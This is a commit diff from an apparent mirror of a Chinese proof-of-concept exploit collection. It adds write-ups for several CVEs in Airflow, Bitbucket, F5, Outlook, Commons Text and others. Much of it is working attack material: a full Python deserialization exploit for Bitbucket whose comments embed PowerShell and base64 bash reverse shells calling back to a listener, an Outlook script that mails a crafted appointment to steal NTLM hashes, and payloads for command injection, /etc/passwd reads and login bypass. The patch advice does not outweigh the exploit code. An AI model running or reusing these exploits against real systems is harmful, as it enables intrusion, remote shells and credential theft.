admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-05 02:37:58 +00:00
Code Issues Packages Projects Releases Wiki Activity

更新漏洞

Browse Source
This commit is contained in:
Threekiii 2023-08-03 08:54:06 +08:00
parent 61a7f98a40
commit 8e4f0be1f7
14 changed files with 665 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
OA产品漏洞/泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞.md Normal file
View File

@ -0,0 +1,29 @@
# 泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞
## 漏洞描述
泛微 e-cology 前台任意用户登录漏洞:泛微 e-cology9 部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
## 漏洞影响
```
部分 e-cology9 且补丁版本 < 10.57
```
## 漏洞复现
poc1
```
/mobile/plugin/1/ofsLogin.jsp?syscode=syscode&timestamp=2&gopage=3&receiver=test&loginTokenFromThird=
```
poc2
```
/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp
```
## 漏洞修复
目前官方已发布修复建议建议受影响的用户尽快升级至最新版本的补丁。下载地址https://www.weaver.com.cn/cs/securityDownload.asp#

2
OA产品漏洞/蓝凌OA sysSearchMain.do 远程命令执行漏洞.md
View File

@ -33,8 +33,6 @@ method 为 editrParam。 对 fdParemNames 的内容进行了判空。如果不
将传入进来的 string 字符进行替换。将其载入字节数组缓冲区,在传递给 objectXmlDecoder。 在 objectXmlDecoder 中。就更明显了。典型的 xmlDecoder 反序列化。 整体流程只对 FdParameters 的内容进行了一些内容替换。 导致 xmlDecoder 反序列化漏洞。
其中存在利用 custom.jsp 文件导致前台的命令执行以及文件上传,发送请求执行命令
```

24
README.md
View File

@ -4,6 +4,7 @@
## 0x01 项目导航
* HW 高危漏洞2021-2023
* 微信小程序反编译
* 蜜罐技术研究与识别
- CMS漏洞
@ -76,11 +77,13 @@
* 禅道 12.4.2 CSRF漏洞 CNVD-2020-68552
* 禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325
* 禅道 V16.5 SQL 注入 CNVD-2022-42853
* 禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709
* 齐博CMS V7 job.php 任意文件读取漏洞
- OA产品漏洞
* O2OA invoke 后台远程命令执行漏洞 CNVD-2020-18740
* O2OA open 后台任意文件读取漏洞
* Untitled
* 一米OA getfile.jsp 任意文件读取漏洞
* 万户OA DocumentEdit.jsp SQL注入漏洞
* 万户OA download_ftp.jsp 任意文件下载漏洞
@ -112,6 +115,7 @@
* 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
* 泛微OA E-cology KtreeUploadAction 任意文件上传
* 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
* 泛微OA E-Cology ofsLogin.jsp 前台任意用户登录漏洞
* 泛微OA E-Cology users.data 敏感信息泄漏
* 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
* 泛微OA E-cology WorkflowServiceXml RCE
@ -134,6 +138,7 @@
* 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
* 用友 GRP-U8 UploadFileData 任意文件上传漏洞
* 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
* 用友 NC Cloud 远程代码执行漏洞 CNVD-C-2023-76801
* 用友 NC FileReceiveServlet 反序列化RCE漏洞
* 用友 NC NCFindWeb 任意文件读取漏洞
* 用友 NC XbrlPersistenceServlet反序列化
@ -200,9 +205,12 @@
* Alibaba Canal config 云密钥信息泄露漏洞
* Alibaba Nacos secret.key默认密钥 未授权访问漏洞
* Alibaba Nacos 未授权访问漏洞
* Alibaba Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001
* Alibaba otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
* Apache Airflow 远程代码执行漏洞 CVE-2022-40127
* Appspace jsonprequest SSRF漏洞 CVE-2021-27670
* Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804
* Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133
* Atlassian Bitbucket 登录绕过漏洞
* Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084
* Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396
@ -300,6 +308,8 @@
* ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440
* ShowDoc PageController.class.php 任意文件上传漏洞
* ShowDoc 前台文件上传漏洞
* Smartbi 登录绕过漏洞
* Smartbi 远程命令执行漏洞
* SolarView Compact 命令注入漏洞 CVE-2022-40881
* SonarQube search_projects 项目信息泄露漏洞
* SonarQube values 信息泄露漏洞 CVE-2020-27986
@ -377,6 +387,8 @@
* 深信服 日志中心 c.php 远程命令执行漏洞
* 深信服 行为感知系统 c.php 远程命令执行漏洞
* 瑞友 应用虚拟化系统 GetBSAppUrl SQL注入漏洞
* 瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞
* 用友 畅捷通 T+ 前台远程命令执行漏洞 QVD-2023-13615
* 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
* 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
* 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
@ -401,6 +413,7 @@
* 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
* 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞
* 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336
* 金蝶 K3Cloud BinaryFormatter 反序列化漏洞
* 银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437
* 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
* 阿尔法科技 虚拟仿真实验室 未授权访问漏洞
@ -424,6 +437,7 @@
* Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749
* Apache Druid 远程代码执行漏洞 CVE-2021-25646
* Apache Druid 远程代码执行漏洞 CVE-2021-26919
* Apache Druid 远程代码执行漏洞 QVD-2023-9629
* Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518
* Apache Flink 目录遍历漏洞 CVE-2020-17519
* Apache HTTPd 换行解析漏洞 CVE-2017-15715
@ -438,7 +452,7 @@
* Apache OF Biz RMI Bypass RCE CVE 2021 29200
* Apache OFBiz RMI反序列化漏洞 CVE-2021-26295
* Apache ShenYu dashboardUser 账号密码泄漏漏洞 CVE-2021-37580
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
* Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933
* Apache Shiro 小于1.2.4反序列化漏洞 CVE-2016-4437
* Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483
* Apache Solr JMX服务 RCE CVE-2019-12409
@ -449,6 +463,7 @@
* Apache Solr stream.url 任意文件读取漏洞
* Apache Solr Velocity模板远程执行 CVE-2019-17558
* Apache Solr XXE 漏洞 CVE-2017-12629
* Apache Solr 代码执行漏洞 CNVD-2023-27598
* Apache Solr 远程执行漏洞 CVE-2019-0193
* Apache Spark create 未授权访问漏洞
* Apache Spark doAs 远程命令执行漏洞 CVE-2022-33891
@ -488,14 +503,18 @@
* K8s etcd未授权访问
- 其他漏洞
* Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363
* Microsoft Outlook 权限提升漏洞 CVE-2023-23397
* Microsoft Word 远程代码执行漏洞 CVE-2023-21716
* 微信客户端 远程命令执行漏洞
- 开发框架漏洞
* Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
* Apache OFBiz 反序列化 CVE-2021-30128
* Apache OfBiz 服务器端模板注入 SSTI
* Apache OfBiz 远程代码执行 RCE
* FastAdmin 远程代码执行漏洞
* Fastjson 远程代码执行漏洞 CVE-2022-25845
* Jackson Databind SSRF RCE CVE 2020 36179 36182
* Jackson-databind远程代码执行 CVE-2019-12384
* jQuery XSS漏洞 CVE-2020-11022 11023
@ -508,6 +527,8 @@
* Rails sprockets 任意文件读取漏洞 CVE-2018-3760
* Spring Cloud Config 目录遍历漏洞 CVE-2019-3799
* Spring Cloud Function SPEL 远程命令执行漏洞
* Spring Framework 安全绕过漏洞 CVE-2023-20860
* ThinkPHP 命令执行漏洞 CNVD-2022-86535
* XStream SSRF 反序列化漏洞 CVE-2020-26258
* XStream 任意文件删除 反序列化漏洞 CVE-2020-26259
- 开发语言漏洞
@ -533,6 +554,7 @@
- 服务器应用漏洞
* Apache RocketMQ RCE 漏洞 CVE-2023-33246
* Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582
* ClickHouse API 数据库接口未授权访问漏洞
* Consul Docker images 空密码登录漏洞 CVE-2020-29564
* ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427

35
Web应用漏洞/Apache Airflow 远程代码执行漏洞 CVE-2022-40127.md Normal file
View File

@ -0,0 +1,35 @@
# Apache Airflow 远程代码执行漏洞 CVE-2022-40127
## 漏洞描述
Apache Airflow 是一个可编程调度和监控的工作流平台基于有向无环图DAGAirflow 可以定义一组有依赖的任务,按照依赖依次执行。
当攻击者可访问到 Apache Airflow 的后台,且环境中存在默认 Example Dags则可构造恶意请求借助 run_id 执行任意命令。
## 漏洞影响
```
Airflow < 2.4.0
```
## FOFA
```
app="APACHE-Airflow"
```
## 漏洞复现
登录 Airflow在任意 DAG 行,点击 Actions 列的三角符号再点击“Trigger DAG w/ config”。
进入配置,在 Run id (Optional) 处输入 Payload
```
{"lab":"\";curl `uname`.****.dnslog.pw;\""}
```
在 DNSLog 查看回显。
## 修复建议
官方已发布版本 2.4.3,可升级 Apache Airflow 版本到 2.4.0 或以上,或者停用默认 Dags。

196
Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md Normal file
View File

@ -0,0 +1,196 @@
# Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133
## 漏洞描述
Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。
## 漏洞影响
```
Atlassian Bitbucket Data Center >= 5.14.x
Atlassian Bitbucket Data Center 6.x
Atlassian Bitbucket Data Center < 7.6.14
Atlassian Bitbucket Data Center < 7.16.x
Atlassian Bitbucket Data Center < 7.17.6
Atlassian Bitbucket Data Center < 7.18.4
Atlassian Bitbucket Data Center < 7.19.4
Atlassian Bitbucket Data Center 7.20.0
```
## FOFA
```
app="ATLASSIAN-Bitbucket"
```
## 漏洞复现
exp
```
python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt
```
```
#!/usr/bin/env python3
## -*- coding: utf_8 -*-
## @Time : 2022/5/7 0007 9:58
from urllib.parse import urlparse
import argparse
import requests
import logging
import socket
import time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
'''
Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)
## Windows Reverse Shell(未免杀)
command: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"
## Linux Reverse Shell
command: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
'''
class CVE_2022_26133:
def __init__(self, target):
parse = urlparse(target)
self.url = parse.scheme + "://" + parse.netloc
self.log_init()
self.timeout = 3
self.proxies = None
## self.proxies = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}
def log_init(self):
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def str_to_hex(self, param):
ll = []
for i in param:
ll.append(hex(ord(i)).split("x")[1])
return "".join(ll)
def dec_to_hex(self, param, n):
if n == 4:
return '{:04x}'.format(param)
elif n == 8:
return '{:08x}'.format(param)
def get_socket_connect(self):
try:
parse = urlparse(self.url)
target = parse.netloc.split(":")[0]
## default port
port = 5701
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(self.timeout)
sock.connect((target, port))
return sock
except Exception as msg:
logging.critical("target is not reachable, " + str(msg))
def generate_payload(self, cluster, command):
payload = cluster.hex()
payload += "FFFFFF9C"
## yso cb1 payload
payload += "ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870"
payload += self.dec_to_hex((1684 + len(command)), 8)
payload += "CAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01"
payload += self.dec_to_hex((len(command)), 4)
payload += self.str_to_hex(command)
payload += "08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001D79736F73657269616C2F50776E6572383931393230313938343538303001001F4C79736F73657269616C2F50776E657238393139323031393834353830303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78"
## logging.info("payload: " + payload)
return payload
def verify(self, Batch=False):
logging.debug("Checking " + self.url)
try:
sock = self.get_socket_connect()
if sock is not None:
## get ClusterName
data = "000000027361"
sock.send(bytes.fromhex(data))
ClusterName = sock.recv(4) + sock.recv(1024)
sock.close()
if len(ClusterName) != 0:
logging.info("\033[0;36mTarget is vulnerable.\033[0m")
if Batch != False:
with open("success.txt", "a+") as fo:
fo.write(self.url + "\n")
fo.close()
return ClusterName
except Exception as msg:
logging.critical(msg)
def exploit(self, command):
ClusterName = self.verify()
if ClusterName is not None:
try:
sock = self.get_socket_connect()
if sock is not None:
logging.info("command => " + command)
payload = self.generate_payload(ClusterName, command)
sock.send(bytes.fromhex(payload))
time.sleep(0.5)
res = sock.recv(1024)
sock.close()
if len(res) != 0:
logging.info("payload send success, check it.")
except Exception as msg:
if isinstance(msg, ConnectionResetError):
logging.warning("ConnectionResetError: Payload maybe execute successful once target is Linux, Check it.")
else:
logging.critical(msg)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='url', help='input target url, eg: http://192.168.1.1:7990/')
parser.add_argument('--verify', action='store_true', default=False, help='verify mode, verify if target is vulnerable.')
parser.add_argument('-c', dest='command', help='exploit mode, eg: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}')
parser.add_argument('-f', dest='file', help='verify targets in the file if vulnerable.')
args = parser.parse_args()
print("""
______ _______ ____ ___ ____ ____ ____ __ _ __________
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \ / /_ / |___ /___ /
| | \ \ / /| _| _____ __) | | | |__) | __) |____ __) | '_ \| | |_ \ |_ \
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/| (_) | |___) |__) |
\____| \_/ |_____| |_____|\___/_____|_____| |_____|\___/|_|____/____/
""")
if args.verify:
CVE_2022_26133(args.url).verify()
elif args.file:
with open(args.file, 'r') as f:
targets = f.readlines()
f.close()
for target in targets:
CVE_2022_26133(target.strip()).verify(True)
elif args.command:
CVE_2022_26133(args.url).exploit(args.command)
```
## 漏洞修复
当前官方已发布最新版本建议受影响的用户及时更新升级到最新版本。链接如下https://www.atlassian.com/software/bitbucket/download-archives

33
Web应用漏洞/F5 BIG-IP iControl REST身份认证绕过漏洞 CVE-2022-1388.md
View File

@ -35,4 +35,35 @@ Content-Length: 39
{"command":"run","utilCmdArgs":"-c id"}
```
![](./images/202205241449854.png)
![](./images/202205241449854.png)
文件读取:
```
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
RCE
```
RCE
```
https://your-ip/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
```
检测脚本https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
使用方法:
```
./CVE-2022-1388.sh hosts.txt
```
## 漏洞修复
建议升级至最新版本或可参考官方修复建议 Recommended Actionshttps://support.f5.com/csp/article/K23605346
在受影响的版本内可执行以下步骤以缓解攻击:
- 通过自身 IP 地址阻止 iControl REST 访问。
- 通过管理界面阻止 iControl REST 访问。
- 修改 BIG-IP httpd 配置。

38
Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480
View File

@ -1,38 +0,0 @@
# KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480
## 漏洞描述
KubeOperator 是一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 Kubernetes 集群。CVE-2023-22480 中由于下载kubeconfig的路径不需要身份认证导致攻击者可直接下载kubeconfig获取相关敏感信息。
## 漏洞影响
KubeOperator < 3.16.4
## FOFA
```
app="KubeOperator"
```
## 漏洞复现
登陆页面
![image-20230504140910659](images/image-20230504140910659.png)
在补丁中修复了配置文件下载接口的未授权
![image-20230504140927095](images/image-20230504140927095.png)
当集群存在时可通过接口未授权下载配置文件
![image-20230504140945600](images/image-20230504140945600.png)
验证POC (k8s为集群名称不固定)
```
/api/v1/clusters/kubeconfig/k8s
```
![image-20230504141007260](images/image-20230504141007260.png)

BIN
Web服务器漏洞/images/image-20230801093324881.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 128 KiB

27
其他漏洞/Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363.md Normal file
View File

@ -0,0 +1,27 @@
# Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363
## 漏洞描述
Foxit PDF Reader 及 Editor 中存在任意代码执行漏洞,由于 Foxit PDFReader/Editor 未验证 exportXFAData 方法中的 cPath 参数,使得恶意的.hta 文件写入 Startup 目录中,攻击者可通过诱导受害者打开特制的 PDF 文档触发此漏洞,系统重启后将执行攻击者的恶意代码。
## 漏洞影响
```
Foxit PDF Reader <= 12.1.1.15289
Foxit PDF Editor 12.x <= 12.1.1.15289
Foxit PDF Editor 11.x <= 11.2.5.53785
Foxit PDF Editor <= 10.1.11.37866
```
## 漏洞复现
poc
https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363
## 漏洞修复
目前官方已发布可更新版本,受影响用户可通过以下任一步骤进行更新:
1. 在 Foxit PDF 阅读器或 Foxit PDF 编辑器中,点击“帮助”>“关于 Foxit PDF阅读器”或“关于 Foxit PDF 编辑器”>“检查更新”(对于 10 版本或更早的版本,点击“帮助”>“检查更新”)以更新到最新版本。
2. 手动下载更新https://www.foxit.com/downloads/

119
其他漏洞/Microsoft Outlook 权限提升漏洞 CVE-2023-23397.md Normal file
View File

@ -0,0 +1,119 @@
# Microsoft Outlook 权限提升漏洞 CVE-2023-23397
## 漏洞描述
该漏洞存在于 Microsoft Outlook 中是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。
## 漏洞影响
```
Microsoft Outlook 2016 (64-bit edition)
Microsoft Outlook 2013 Service Pack 1 (32-bit editions)
Microsoft Outlook 2013 RT Service Pack 1
Microsoft Outlook 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2019 for 32-bit editions
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft Office 2019 for 64-bit editions
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Outlook 2016 (32-bit edition)
Microsoft Office LTSC 2021 for 32-bit editions
```
## 漏洞复现
exp
```
python CVE-2023-23397.py --path '\\your-ip\'
```
```
import smtplib, datetime, argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.utils import COMMASPACE, formatdate
from independentsoft.msg import Message
## Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587
sender_email = "attacker@mail.example.com"
sender_password = "P@ssw0rd"
recipients_email = ["victim@mail.example.com"]
class Email:
def __init__(self, smtp_server, port, username, password, recipient):
self.smtp_server = smtp_server
self.port = port
self.username = username
self.password = password
self.recipient = recipient
def send(self, subject, body, attachment_path):
msg = MIMEMultipart()
msg['From'] = self.username
msg['To'] = COMMASPACE.join(self.recipient)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f:
part = MIMEApplication(f.read(), Name=attachment_path)
part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
msg.attach(part)
try:
server = smtplib.SMTP(self.smtp_server, self.port)
server.starttls()
server.login(self.username, self.password)
server.sendmail(self.username, self.recipient, msg.as_string())
server.quit()
print("[+] Malicious appointment sent !")
except Exception as e:
print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()
appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")
```
## 漏洞修复
目前微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁,建议受影响用户开启系统自动更新安装补丁进行防护。
由于网络问题、计算机环境问题等原因Windows Update 的补丁更新可能出现失败。用户在安装补丁后应及时检查补丁是否成功更新。右键点击Windows 徽标,选择“设置(N)”,选择“更新和安全”-“Windows 更新”,查看该页面上的他提示信息,也可点击“查看更新历史记录”查看历史更新情况。
针对未成功安装更新补丁的情况,可直接下载离线安装包进行更新,链接如下:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397
临时防护措施:
若用户无法正常进行补丁修复,在不影响正常业务的情况下,可使用以下措施对漏洞进行防护:
1. 将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。注意:该操作可能会对需要 NTLM 的应用程序造成一定影响。详情请参考:
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group
2. 用户可通过在网络中同时使用外围防火墙和本地防火墙,并通过 VPN 设置来阻止 TCP 445/SMB 从网络出站。注意:该操作将禁止发送 NTLM 身份验证消息到远程文件共享。

72
开发框架漏洞/Apache Commons Text 远程代码执行漏洞 CVE-2022-42889.md Normal file
View File

@ -0,0 +1,72 @@
# Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
## 漏洞描述
Apache Commons Text 项目实现了一系列关于文本字符串的算法专注于处理字符串和文本块。10月13日Apache发布安全公告修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
## 漏洞影响
```
1.5.0 ≤ Apache Commons Text 1.10.0
```
## 环境搭建
IDEA 通过 Maven 导入依赖pox.xml 如下:
```
<dependencies>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-configuration2</artifactId>
<version>2.7</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.9</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-lang3</artifactId>
<version>3.12.0</version>
</dependency>
</dependencies>
```
测试代码:
```
package org.text;
import org.apache.commons.text.StringSubstitutor;
public class Main {
public static void main(String[] args) {
StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
// String payload = interpolator.replace("${script:js:new
// java.lang.ProcessBuilder(\"calc\").start()}");
String payload = "${script:js:new java.lang.ProcessBuilder(\"calc\").start()}";
interpolator.replace(payload);
}
}
```
## 漏洞复现
Payload
```
search=${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
url编码
